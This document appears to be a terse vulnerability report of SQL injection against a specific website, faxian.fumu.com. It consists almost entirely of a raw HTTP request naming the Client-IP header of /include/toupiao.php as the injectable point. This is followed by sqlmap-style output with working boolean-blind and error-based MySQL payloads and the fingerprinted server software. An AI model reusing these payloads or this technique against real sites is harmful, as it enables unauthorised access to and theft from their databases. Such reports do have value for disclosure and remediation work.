faxian.fumu.com
注入:GET /include/toupiao.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Client-IP: *Cookie: 6yBB_fa86_lastvisit=1384479513; 6yBB_fa86_sid=P9mnMe; 6yBB_fa86_lastact=1384483197%09faxian.php%09Host: faxian.fumu.comConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*Place: (custom) HEADERParameter: Client-IP #1*Type: boolean-based blindTitle: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)Payload: ' RLIKE IF(9693=9693,0x436c69656e742d49502c2a,0x28) AND 'rGQy'='rGQyType: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE or HAVING clausePayload: ' AND (SELECT 2979 FROM(SELECT COUNT(*),CONCAT(0x7162686671,(SELECT (CASE WHEN (2979=2979) THEN 1 ELSE 0 END)),0x717a697071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YJeP'='YJeP---web server operating system: Linux Ubuntuweb application technology: PHP 5.3.2back-end DBMS: MySQL 5.0